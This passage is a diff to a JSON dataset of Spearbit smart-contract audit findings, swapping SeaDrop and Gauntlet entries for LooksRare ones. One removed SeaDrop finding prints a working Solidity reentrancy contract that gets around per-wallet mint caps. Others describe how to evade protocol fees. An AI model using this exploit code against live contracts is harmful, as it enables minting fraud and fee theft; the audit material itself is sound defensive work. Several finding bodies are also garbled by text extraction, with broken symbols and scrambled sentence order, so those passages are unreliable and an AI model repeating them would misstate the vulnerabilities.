the call to viewCreatorFeeInfo for both CreatorFeeManagerWithRebates and Cre- atorFeeManagerWithRoyalties is dependent on the order of itemIds. Assume, we have 2 itemIds with the following properties: itemId x where the call to collection.royaltyInfo(x, price) is successful (status == 1) and returns (a, ...) where a 6= 0. itemId y where the call to collection.royaltyInfo(y, price) fails (status == 0) Then if itemIds provided to viewCreatorFeeInfo is: [x, y], the call to viewCreatorFeeInfo returns successfully as the outcome for y will be ignored/skipped. [y, x], the call to viewCreatorFeeInfo reverts with BundleEIP2981NotAllowed(collection), since the first item will be skipped and so the initial value for creator will not be set and remains address(0), but when we process the loop for x, we end up comparing a with address(0) which causes the revert.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Provide definition of weights & managementFee_ in the NatSpec comment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The NatSpec Format is special form of comments to provide rich documentation for functions, return variables and more. We observed an occurrence where the NatSpec comments are missing for two of the user inputs (weights & managementFee_).", + "title": "CreatorFeeManagerWithRebates.viewCreatorFeeInfo reversion is dependent on the order of itemIds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Assume there is an itemId x where collection.royaltyInfo(x, price) returns (0, _) and an- other itemId y where collection.royaltyInfo(y, price) returns (a, _) where a 6= 0. the itemIds array provided to CreatorFeeManagerWithRebates.viewCreatorFeeInfo is [x, y, the call would revert with the return parameters would be (address(0), 0) and [y, x, ...], Then if ...], BundleEIP2981NotAllowed(collection).", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "ERC721SeaDrop's modifier onlyOwnerOrAdministrator would allow either the owner or the admin to override the other person's config parameters.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The following 4 external functions in ERC721SeaDrop have the onlyOwnerOrAdministrator modifier which allows either one to override the other person's work. updateAllowedSeaDrop updateAllowList updateDropURI updateSigner That means there should be some sort of off-chain trust established between these 2 entities. Otherwise, there are possible vectors of attack. Here is an example of how the owner can override AllowListData.merkleRoot and the other fields within AllowListData to generate proofs for any allowed SeaDrop's mintAllowList endpoint that would have MintParams.feeBps equal to 0: 1. The admin calls updateAllowList to set the Merkle root for this contract and emit ERC721SeaDrop.updateAllowList: SeaDrop.sol#L827 the other parameters as logs. for an allowed SeaDrop implementation The SeaDrop endpoint being called by 2. The owner calls updateAllowList but this time with new parameters, specifically a new Merkle root that is computed from leaves that have MintParams.feeBps == 0. 3. Users/minters use the generated proof corresponding to the latest allow list update and pass their mintParams.feeBps as 0. And thus avoiding the protocol fee deduction for the creatorPaymentAddress (SeaDrop.sol#L187-L194).", + "title": "Seller might get a lower fee than expected due to front-running", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "This protocol seems to have a fee structure where both the protocol and the original creator of the item are charging fees, and these fees are being subtracted from the seller's fee. This means that the seller, whether they are a maker or a taker, may receive a lower price than they expected due to sudden changes in creator or protocol fee rates.", "labels": [ "Spearbit", - "Seadrop", - "Severity: High Risk" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Reentrancy of fee payment can be used to circumvent max mints per wallet check", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "In case of a mintPublic call, the function _checkMintQuantity checks whether the minter has exceeded the parameter maxMintsPerWallet, among other things. However, re-entrancy in the above fee dispersal mechanism can be used to circumvent the check. The following is an example contract that can be employed by the feeRecipent (assume that maxMintsPerWallet is 1): 7 contract MaliciousRecipient { bool public startAttack; address public token; SeaDrop public seaDrop; fallback() external payable { if (startAttack) { startAttack = false; seaDrop.mintPublic{value: 1 ether}({ nftContract: token, feeRecipient: address(this), minterIfNotPayer: address(this), quantity: 1 }); } } // Call `attack` with at least 2 ether. function attack(SeaDrop _seaDrop, address _token) external payable { token = _token; seaDrop = _seaDrop; startAttack = true; _seaDrop.mintPublic{value: 1 ether}({ nftContract: _token, feeRecipient: address(this), minterIfNotPayer: address(this), quantity: 1 }); token = address(0); seaDrop = SeaDrop(address(0)); } } This is especially bad when the parameter PublicDrop.restrictFeeRecipients is set to false, in which case, anyone can circumvent the max mints check, making it a high severity issue. In the other case, only privileged users, i.e., should be part of _allowedFeeRecipients[nftContract] mapping, would be able to circumvent the check--lower severity due to needed privileged access. Also, creatorPaymentAddress can use re-entrancy to get around the same check. See SeaDrop.sol#L571.", + "title": "StrategyManager does not emit an event when the first strategy gets added.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "StrategyManager does not emit an event when the first strategy gets added which can cause issues for off-chain agents.", "labels": [ "Spearbit", - "Seadrop", - "Severity: High Risk" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Cross SeaDrop reentrancy", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The contract that implements IERC721SeaDrop can work with multiple Seadrop implementations, for example, a Seadrop that accepts ETH as payment as well as another Seadrop contract that accepts USDC as payment at the same time. This introduces the risk of cross contract re-entrancy that can be used to circumvent the maxMintsPerWallet check. Here's an example of the attack: 1. Consider an ERC721 token that that has two allowed SeaDrop, one that accepts ETH as payment and the other that accepts USDC as payment, both with public mints and restrictedFeeRecipients set to false. 2. Let maxMintPerWallet be 1 for both these cases. 3. A malicious fee receiver can now do the following: Call mintPublic for the Seadrop with ETH fees, which does the _checkMintQuantity check and trans- fers the fees in ETH to the receiver. The receiver now calls mintPublic for Seadrop with USDC fees, which does the _checkMintQuantity check that still passes. The mint succeeds in the Seadrop-USDC case. The mint succeeds in the Seadrop-ETH case. The minter has 2 NFTs even though it's capped at 1. Even if a re-entrancy lock is added in the SeaDrop, the same issue persists as it only enters each Seadrop contract once.", + "title": "TransferSelectorNFT does not emit events when new transfer managers are added in its construc- tor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "TransferSelectorNFT does not emit an event when assetTypes of 0 and 1 are added in its con- structor.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Medium Risk" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Lack of replay protection for mintAllowList and mintSigned", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "merkle proofs) there are no checks that prevent re-using the same signature or Merkle proof multiple This is indirectly enforced by the _checkMintQuantity function that checks the mint statistics times. using exceeds maxMintsPerWallet. Replays can happen if a wallet does not claim all of maxMintsPerWallet in one transaction. For example, assume that maxMintsPerWallet is set to 2. A user can call mintSigned with a valid signature and quantity = 1 twice. IERC721SeaDrop(nftContract).getMintStats(minter) reverting quantity and the if Typically, contracts try to avoid any forms of signature replays, i.e., a signature can only be used once. This simpli- fies the security properties. In the current implementation of the ERC721Seadrop contract, we couldn't see a way to exploit replay protection to mint beyond what could be minted in a single initial transaction with the maximum value of quantity supplied. However, this relies on the contract correctly implementing IERC721SeaDrop.getMintStats.", + "title": "Protocol fees will be sent to address(0) if protocolFeeRecipient is not set.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Protocol fees will be sent to address(0) if protocolFeeRecipient is not set.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Medium Risk" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "The digest in SeaDrop.mintSigned is not calculated correctly according to EIP-712", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "mintParams in the calculation of the digest in mintSigned is of struct type, so we would need to calculate and use its hashStruct , not the actual variable on its own.", + "title": "The returned price by strategies are not validated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "When a taker submits an order to be executed, the returned price by the maker's chosen strategy is not validated. The current strategies do have the validations implemented. But the general upper and lower bound price validation would need to be in the protocol contract itself since the price calculation in a potential strategy might be a complex matter that cannot be easily verified by a maker or a taker. Related issue: \"price validation in executeStrategyWithTakerAsk, executeCollectionStrategyWithTakerAsk and ex- ecuteCollectionStrategyWithTakerAskWithProof can be relaxed\"", "labels": [ "Spearbit", - "Seadrop", - "Severity: Medium Risk" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "ERC721A has mint caps that are not checked by ERC721SeaDrop", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "ERC721SeaDrop inherits from ERC721A which packs balance, numberMinted, numberBurned, and an extra data chunk in 1 storage slot (64 bits per substorage) for every address. This would add an inherent cap of 264 (cid:0) 1 to all these different fields. Currently, there is no check in ERC721A's _mint for quantity nor in ERC721SeaDrop's mintSeaDrop function. Also, if we almost reach the max cap for a balance by an owner and someone else transfers a token to this owner, there would be an overflow for the balance and possibly the number of mints in the _packedAddressData. The overflow could possibly reduce the balance and the numberMinted to a way lower numer and numberBurned to a way higher number", + "title": "Makers can sign (or be tricked into signing) collection of orders (using the merkle tree mechanism) that cannot be entirely canceled.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "All user-facing order execution endpoints of the protocol check whether the order hash is included in the merkle tree data provided by the caller. If it is, the maker/signer is only required to sign the hash of the tree's root. A maker might sign (or get tricked into signing) a root that belongs to trees with a high number of leaves such that the leaves each encode an order with Different subsetNonce and orderNonce (this would require canceling each nonce individually if the relevant endpoints are used). askNonce or bidNonce that form a consecutive array of intergers ( 1, (cid:1) (cid:1) (cid:1) , n ) (this would require incrementing these nonces at least n times, if this method was used as a way of canceling the orders). To cancel these orders, the maker would need to call the cancelOrderNonces, cancelSubsetNonces, or incre- mentBidAskNonces. If the tree has a high number of nodes, it might be infeasible to cancel all the orders due to gas costs. The maker would be forced to remove its token approvals (if it's not a custom EIP-1271 maker/signer) and not use that address again to interact with the protocol.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Medium Risk" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "ERC721SeaDrop owner can choose an address they control as the admin when the constructor is called.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The owner/creator can call the contract directly (skip using the UI) and set the administrator as themselves or another address that they can control. Then after they create a PublicDrop or TokenGatedDrop, they can call either updatePublicDropFee or updateTokenGatedDropFee and set the feeBps to zero or another number and also call the updateAllowedFeeRecipient to add the same or another address they control as a feeRecipient. This way they can circumvent the protocol fee.", + "title": "The ItemIdsRange strategy allows for length mismatch in itemIds and amounts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "There is no validation that takerAsk.itemIds.length == takerAsk.amounts.length in the ItemIdsRange strategy, despite takerAsk.itemIds and takerAsk.amounts being the return values of the executeStrategyWithTakerAsk function. If takerAsk.itemIds.length > takerAsk.amounts.length, then the transaction will revert anyways when it attempts to read an index out of bounds in the main loop. However, there is nothing causing a revert if takerAsk.itemIds.length < takerAsk.amounts.length, and any extra values in the takerAsk.amounts array will be ignored. Most likely this issue would be caught later on in any transaction, e.g. the current TransferManager implementation checks for length mismatches. However, this TransferManager is just one possible implementation that could be added to the TransferSelectorNFT contract, so this still could be an issue.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Medium Risk" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "ERC721SeaDrop's admin would need to set feeBps manually after/before creation of each drop by the owner", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "When an owner of a ERC721SeaDrop token creates either a public or a token gated drop by calling updatePublicDrop or updateTokenGatedDrop, the PublicDrop.feeBps/TokenGatedDropStage.feeBps is initially set to 0. So the admin would need to set the feeBps parameter at some point (before or after). Forgetting to set this parameter results in not receiving the protocol fees.", + "title": "Spec mismatch - StrategyCollectionOffer allows the only single item orders where the spec states it should allow any amount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Proof only allow the transfer of a single ERC721/ERC1155 item, although the specification states it should support any amount.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Medium Risk" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "owner can reset feeBps set by admin for token gated drops", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Only the admin can call updateTokenGatedDropFee to update feeBps. However, the owner can call updateTokenGatedDrop(address seaDropImpl, address allowedNftToken, TokenGatedDropStage calldata drop- Stage) twice after that to reset the feeBps to 0 for a drop. 1. Once with dropStage.maxTotalMintableByWallet equal to 0 to wipe out the storage on the SeaDrop side. 2. Then with the same allowedNftToken address and the other desired parameters, which would retrieve the previously wiped out drop stage data (with feeBps equal to 0). NOTE: This type of attack does not apply to updatePublicDrop and updatePublicDropFee pair. Since updatePub- licDrop cannot remove or update the feeBps. Once updatePublicDropFee is called with a specific feeBps that value remains for this ERC721SeaDrop contract-related storage on SeaDrop (_publicDrops[msg.sender] = pub- licDrop). And any number of consecutive calls to updatePublicDrop with any parameters cannot change the already set feeBps.", + "title": "Owner of strategies that inherit from BaseStrategyChainlinkMultiplePriceFeeds can add mali- cious price feeds after they have been added to LooksRareProtocol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Owner of strategies that inherit from BaseStrategyChainlinkMultiplePriceFeeds can add mali- cious price feeds for new collections after they have been added to LooksRareProtocol. It's also important to note that these strategy owners might not neccessarily be the same owner as the LooksRareProtocol's. 1. LooksRareProtocol's OL adds strategy S. 2. Stragey's owner OS adds a malicous price feed for a new collection T .", "labels": [ "Spearbit", - "Seadrop", - "Severity: Medium Risk" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Update the start token id for ERC721SeaDrop to 1", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "ERC721SeaDrop's mintSeaDrop uses _mint from ERC721A library which starts the token ids for minting from 0. /// contracts/ERC721A.sol#L154-L156 /** * @dev Returns the starting token ID. * To change the starting token ID, please override this function. */ function _startTokenId() internal view virtual returns (uint256) { return 0; }", + "title": "The price calculation in StrategyDutchAuction can be more accurate", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "StrategyDutchAuction calculates the auction price as uint256 duration = makerAsk.endTime - makerAsk.startTime; uint256 decayPerSecond = (startPrice - makerAsk.minPrice) / duration; uint256 elapsedTime = block.timestamp - makerAsk.startTime; price = startPrice - elapsedTime * decayPerSecond; One of the shortcomings of the above calculation is that division comes before multiplication which can amplify the error due to division.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Low Risk" ] }, { - "title": "Update the ERC721A library due to an unpadded toString() function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The audit repo uses ERC721A at dca00fffdc8978ef517fa2bb6a5a776b544c002a which does not add a trailing zero padding to the returned string. Some projects have had issues reusing the toString() where the off-chain call returned some dirty-bits at the end (similar to Seaport 1.0's name()).", + "title": "Incorrect isMakerBidValid logic in ItemIdsRange execution strategy", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "If an ItemIdsRange order has makerBid.itemIds[0] == 0, it is treated as invalid by the corre- sponding isMakerBidValid function. Since makerBid.itemIds[0] is the minItemId value, and since many NFT collections contain NFTs with id 0, this is incorrect (and does not match the logic of the ItemIdsRange executeS- trategyWithTakerAsk function). As a consequence, frontends that filter orders based on the isMakerBidValid function will ignore certain orders, even though they are valid.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Low Risk" ] }, { - "title": "Warn contracts implementing IERC721SeaDrop to revert on quantity == 0 case", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "There are no checks in Seadrop that prevents minting for the case when quantity == 0. This would call the function mintSeadrop(minter, quantity) for a contract implementing IERC721SeaDrop with quantity == 0. It is up to the implementing contract to revert in such cases. The ERC721A library reverts when quantity == 0--the correct behaviour. However, there has been instances in the past where ignoring quantity == 0 checks have led to security issues.", + "title": "Restructure struct definitions in OrderStructs in a more optimized format", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Maker and taker ask and bid structs include the fields itemIds and amounts. For most strategies, these two arrays are supposed to have the same length (except for StrategyItemIdsRange). Even for Strate- gyItemIdsRange one can either: Relax the requirement that makerBid.amounts.length == 1 (be replaced by amounts and itemIds length to be equal to 2 ) by allowing an unused extra amount or not use the makerBid.amounts and makerBid.itemIds and instead grab those 3 parameters from the addi- tionalParameters field. This might actually make more sense since in the case of StrategyItemIdsRange, the itemIds and amounts carry information that deviates from what they are intended to be used for.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Low Risk" + "LooksRare", + "Severity: Gas Optimization" ] }, { - "title": "Missing parameter in _SIGNED_MINT_TYPEHASH", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "A parameter is missing (uint256 maxTokenSupplyForStage) and got caught after reformatting.", + "title": "if/else block in executeMultipleTakerBids can be simplified/optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "if/else block in executeMultipleTakerBids can be simplified/optimized by using the continue keyword and placing the else's body in the outer scope. // If atomic, it uses the executeTakerBid function, if not atomic, it uses a catch/revert pattern with external function ,! if (isAtomic) { // Execute the transaction and add protocol fee totalProtocolFeeAmount += _executeTakerBid(takerBid, makerAsk, msg.sender, orderHash); unchecked { ++i; } continue; } try this.restrictedExecuteTakerBid(takerBid, makerAsk, msg.sender, orderHash) returns ( uint256 protocolFeeAmount ) { totalProtocolFeeAmount += protocolFeeAmount; } catch {} unchecked { ++i; } testThreeTakerBidsERC721OneFails() (gas: -24 (-0.002%)) Overall gas change: -24 (-0.002%) LooksRare: Fixed in PR 323. Spearbit: Verified.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Low Risk" + "LooksRare", + "Severity: Gas Optimization" ] }, { - "title": "Missing address(0) check", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "All update functions having an address as an argument check them against address(0). This is missing in updateTokenGatedDrop. This is also not protected in ERC721SeaDrop.sol#updateTokenGatedDrop(), so address(0) could pass as a valid value.", + "title": "Cache currency in executeTakerAsk and executeTakerBid", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "currency is read multiple times from calldata in executeTakerAsk and executeTakerBid.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Low Risk SeaDrop.sol#L856, SeaDrop.sol#L907-L909, SeaDrop.sol#L927-L929, SeaDrop.sol#L966-L968," + "LooksRare", + "Severity: Gas Optimization" ] }, { - "title": "Missing boundary checks on feeBps", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "There's a missing check when setting feeBps from ERC721SeaDrop.sol while one exists when the value is used at a later stage in Seadrop.sol, which could cause a InvalidFeeBps error.", + "title": "Cache operators[i] in grantApprovals and revokeApprovals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "operators[i] is used 3 times in grantApprovals's (and twice in revokeApprovals) for loop.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Low Risk" + "LooksRare", + "Severity: Gas Optimization" ] }, { - "title": "Upgrade openzeppelin/contracts's version", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "There are known vulnerabilities in the current @openzeppelin/contracts version used. This affects SeaDrop.sol with a potential Improper Verification of Cryptographic Signature vulnerability as ECDSA.recover is used.", + "title": "recipients[0] is never used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "recipients[0] is set to protocolFeeRecipient. But its value is never used afterward. payProtocolFeeAndAffiliateFee, the fees[0] amount is manually distributed to an affiliate if any and the pro- tocolFeeRecipient.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Low Risk" + "LooksRare", + "Severity: Gas Optimization" ] }, { - "title": "struct TokenGatedDropStage is expected to fit into 1 storage slot", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "struct TokenGatedDropStage is expected to be tightly packed into 1 storage slot, as per announced in its @notice tag. However, the struct actually takes 2 slots. This is unexpected, as only one slot is loaded in the dropStageExists assembly check.", + "title": "currency validation can be optimized/refactored", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "In the context above we are enforcing only native tokens or WETH to be supplied. The if statement can be simplified and refactored into a utility function (possibly defined in either BaseStrategy or in BaseStrate- gyChainlinkPriceLatency): if (makerAsk.currency != address(0)) { if (makerAsk.currency != WETH) { revert WrongCurrency(); } }", "labels": [ "Spearbit", - "Seadrop", - "Severity: Low Risk" + "LooksRare", + "Severity: Gas Optimization" ] }, { - "title": "Avoid expensive iterations on removal of list elements by providing the index of element to be removed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Iterating through an array (address[] storage enumeration) to find the desired element (address toRemove) can be an expensive operation. Instead, it would be best to also provide the index to be removed along with the other parameters to avoid looping over all elements. Also note in the case of _removeFromEnumeration(signer, enumeratedStorage), hopefully, there wouldn't be too many signers corresponding to a contract. So practically, this wouldn't be an issue. But something to note. Although the owner or admin can stuff the signer list with a lot of signers as the other person would not be able to remove from the list (DoS attack). For example, if the owner has stuffed the signer list with malicious signers, the admin would not be able to remove them.", + "title": "validating amount can be simplified and possibly refactored", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "In the context above, we are trying to invalidate orders that have 0 amounts or an amount other than 1 when the asset if an ERC721 if (amount != 1) { if (amount == 0) { revert OrderInvalid(); } if (assetType == 0) { revert OrderInvalid(); } } The above snippet can be simplified into: if (amount == 0 or (amount != 1 and assetType == 0)) { revert OrderInvalid(); }", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Gas Optimization" ] }, { - "title": "mintParams.allowedNftToken should be cached", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "mintParams.allowedNftToken is accessed several times in the mintAllowedTokenHolder function. It would be cheaper to cache it: // Put the allowedNftToken on the stack for more efficient access. address allowedNftToken = mintParams.allowedNftToken;", + "title": "_verifyMatchingItemIdsAndAmountsAndPrice can be further optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "_verifyMatchingItemIdsAndAmountsAndPrice's validation logic uses more opcodes than is neces- sary. Also, the whole function can be turned into an assembly block to further optimized this function. Examples of simplifications for if conditions or(X, gt(Y, 0)) or(X, Y) // simplified version or(X, iszero(eq(Y,Z))) or(X, xor(Y, Z)) // simplified version The nested if block below if (amount != 1) { if (amount == 0) { revert OrderInvalid(); } if (assetType == 0) { revert OrderInvalid(); } } can be simplified into 33 if (amount == 0) { revert OrderInvalid(); } if ((amount != 1) && (assetType == 0)) { revert OrderInvalid(); }", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Gas Optimization" ] }, { - "title": "Immutables which are calculated using keccak256 of a string literal can be made constant.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Since Solidity 0.6.12, keccak256 expressions are evaluated at compile-time: Code Generator: Evaluate keccak256 of string literals at compile-time. The suggestion of marking these expressions as immutable to save gas isn't true for compiler versions >= 0.6.12. As a reminder, before that, the occurrences of constant keccak256 expressions were replaced by the expressions instead of the computed values, which added a computation cost.", + "title": "In StrategyFloorFromChainlink premium amounts miss the related checks when compared to checks for discount amounts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "For discount amounts, StrategyFloorFromChainlink has custom checks for the underflows (even though they will be caught by the compiler): 36 if (floorPrice <= discountAmount) { revert DiscountGreaterThanFloorPrice(); } uint256 desiredPrice = floorPrice - discountAmount; ... // @dev Discount cannot be 100% if (discount >= 10_000) { revert OrderInvalid(); } uint256 desiredPrice = (floorPrice * (10_000 - discount)) / 10_000; Similar checks for overflows for the premium are missing in the execution and validation endpoints (even though they will be caught by the compiler, floorPrice + premium or 10_000 + premium might overflow).", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Combine a pair of mapping to a list and mapping to a mapping into mapping to a linked-list", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "SeaDrop uses 3 pairs of mapping to a list and mapping to a mapping that can be combined into just one mapping. The pairs: 1. _allowedFeeRecipients and _enumeratedFeeRecipients 2. _signers and _enumeratedSigners 3. _tokenGatedDrops and _enumeratedTokenGatedTokens Here we have variables that come in pairs. One variable is used for data retrievals (a flag or a custom struct) and the other for iteration/enumeration. mapping(address => mapping(address => CustomStructOrBool)) private variable; mapping(address => address[]) private _enumeratedVariable;", + "title": "StrategyFloorFromChainlink's isMakerBidValid compare the time dependent floorPrice to a fixed discount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "When isMakerBidValid gets called depending on the market conditions at that specific time the comparisons between the floorPrice and the discount might cause this function to either return isValid as true or false.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Gas Optimization" + "LooksRare", + "Severity: Informational" ] }, { - "title": "The onlyAllowedSeaDrop modifier is redundant", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The onlyAllowedSeaDrop modifier is always used next to another one (onlyOwner, onlyAdminis- trator or onlyOwnerOrAdministrator). As the owner, which is the least privileged role, already has the privilege to update the allowed SeaDrop registry list for this contract (by calling updateAllowedSeaDrop), this makes this second modifier redundant.", + "title": "StrategyFloorFromChainlink's isMakerAskValid does not validate makerAsk.additionalParameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "For executeFixedPremiumStrategyWithTakerBid and executeBasisPointsPremiumStrategy- WithTakerBid, maker needs to make sure to populate its additionalParameters with the premium amount, otherwise the taker's transactions would revert: makerAsk.additionalParameters = abi.encode(premium); isMakerAskValid does not check whether makerAsk.additionalParameters has 32 as its length. For example, the validation endpoint for StrategyCollectionOffer does check this for the merkle root.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Gas Optimization" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Combine _allowedSeaDrop and _enumeratedAllowedSeaDrop in ERC721SeaDrop to save storage and gas.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Combine _allowedSeaDrop and _enumeratedAllowedSeaDrop into just one variable using a cyclic linked-list data structure. This would reduce storage space and save gas when storing or retrieving parameters.", + "title": "StrategyFloorFromChainlink strategies do not check for asset types explicitly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "StrategyFloorFromChainlink has 4 different execution endpoints: executeFixedPremiumStrategyWithTakerBid executeBasisPointsPremiumStrategyWithTakerBid executeFixedDiscountCollectionOfferStrategyWithTakerAsk executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk All these endpoints require that only one amount to be passed (asked for or bid on) and that amount would need to be 1. This is in contrast to StrategyCollectionOffer strategy that allows an arbitrary amount (although also required to be only one amount, [a]) Currently, Chainlink only provides price feeds for a selected list of ERC721 collections: https://docs.chain.link/ data-feeds/nft-floor-price/addresses So, if there are no price feeds for ERC1155 (as of now), the transaction would revert. Thus implicitly one can deduce that the chainlink floor strategies are only implemented for ERC721 tokens. Other strategies condition the amounts based on the assetType: 38 assetType == 0 or ERC721 collections can only have 1 as a valid amount assetType == 0 or ERC1155 collections can only have a non-zero number as a valid amount If in the future chainlink or another token-price-feed adds support for some ERC1155 collections, one cannot use the current floor strategies to fulfill an order with an amount greater than 1.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Gas Optimization" + "LooksRare", + "Severity: Informational" ] }, { - "title": ".length should not be looked up in every loop of a for-loop", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Reading an array's length at each iteration of a loop consumes more gas than necessary.", + "title": "itemIds and amounts are redundant fields for takerXxx struct", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Taker is the entity that initiates the calls to LooksRareProtocol's 3 order execution endpoints. Most implemented strategies (which are fixed/chosen by the maker through signing the 